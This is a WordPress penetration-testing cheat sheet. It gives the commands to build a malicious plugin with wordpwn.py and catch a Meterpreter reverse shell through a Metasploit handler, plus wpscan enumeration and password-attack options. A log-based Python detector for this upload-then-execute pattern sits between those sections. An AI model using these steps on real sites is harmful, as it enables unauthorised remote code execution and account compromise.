# wordpress
# Malicious WP Plugin
You need an admin account to upload new plugins.
```
wget https://raw.githubusercontent.com/wetw0rk/malicious-wordpress-plugin/master/wordpwn.py
python wordpwn.py <$LOCAL_IP> <$LOCAL_PORT> Y
```
Start msfconsole with a multi/handler listener:
```
use exploit/multi/handler
set LHOST <$LOCAL_IP>
set LPORT <$LOCAL_PORT>
set PAYLOAD php/meterpreter/reverse_tcp
exploit
```
To trigger the reverse shell, browse to the following URL:
https://<$WORDPRESS_URL>/wp-content/plugins/malicious/wetw0rk_maybe.php
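
On the defensive side, the sequence above leaves a recognisable trail in the web server access log: a POST to the plugin upload endpoint (`/wp-admin/update.php?action=upload-plugin`) followed by a direct request for a PHP file under `wp-content/plugins/`. The following is an added example, not part of the original page or the wordpwn project; it assumes combined-format access logs, and the function name, allowlist parameter and sample log lines are constructed for illustration.

```python
import re

# Constructed sample access-log lines (combined log format); not from a real host.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:10:01:02 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:10:02:10 +0000] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2024:10:02:30 +0000] "GET /wp-content/plugins/akismet/akismet.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:10:03:00 +0000] "GET /wp-content/plugins/malicious/wetw0rk_maybe.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# Plugin upload form target in wp-admin.
UPLOAD_RE = re.compile(r'^/wp-admin/update\.php\?(?:.*&)?action=upload-plugin(?:&|$)')
# Direct request for a PHP file inside a plugin directory.
PLUGIN_PHP_RE = re.compile(r'^/wp-content/plugins/(?P<slug>[^/]+)/[^?]*\.php(?:\?|$)')


def find_upload_then_exec(log_text, known_plugins=frozenset()):
    """Alert when a client that uploaded a plugin later requests a PHP file
    directly under wp-content/plugins/ for a slug not in known_plugins."""
    uploaders = {}  # client IP -> timestamp of its most recent plugin upload
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, path = m["ip"], m["path"]
        if m["method"] == "POST" and UPLOAD_RE.match(path):
            uploaders[ip] = m["ts"]
            continue
        hit = PLUGIN_PHP_RE.match(path)
        if hit and ip in uploaders and hit["slug"] not in known_plugins:
            alerts.append({
                "ip": ip,
                "uploaded_at": uploaders[ip],
                "requested_at": m["ts"],
                "slug": hit["slug"],
                "path": path,
                "status": int(m["status"]),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_upload_then_exec(SAMPLE_LOG, known_plugins={"akismet"}):
        print(alert)
```

Passing the slugs of plugins you actually deploy as `known_plugins` keeps routine admin activity from raising alerts.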
# WPSCAN
# Update wpscan
```
gem update wpscan
```
# Basic Scan
```
wpscan --url example.com --random-user-agent
```
The basic scan checks:
- Headers to discover server information
- Accessibility of xmlrpc.php
- Accessibility of wp-cron.php
- WordPress version
- Active theme and its basic information
- Active plugins and their basic information
- Discoverable Config backups
# Options
- Plugins Detector: `-e vp`
- Themes Detector: `-e vt`
- Users Enumeration: `-e u`
- Passwords Attack: `--passwords <path-wordlist>`
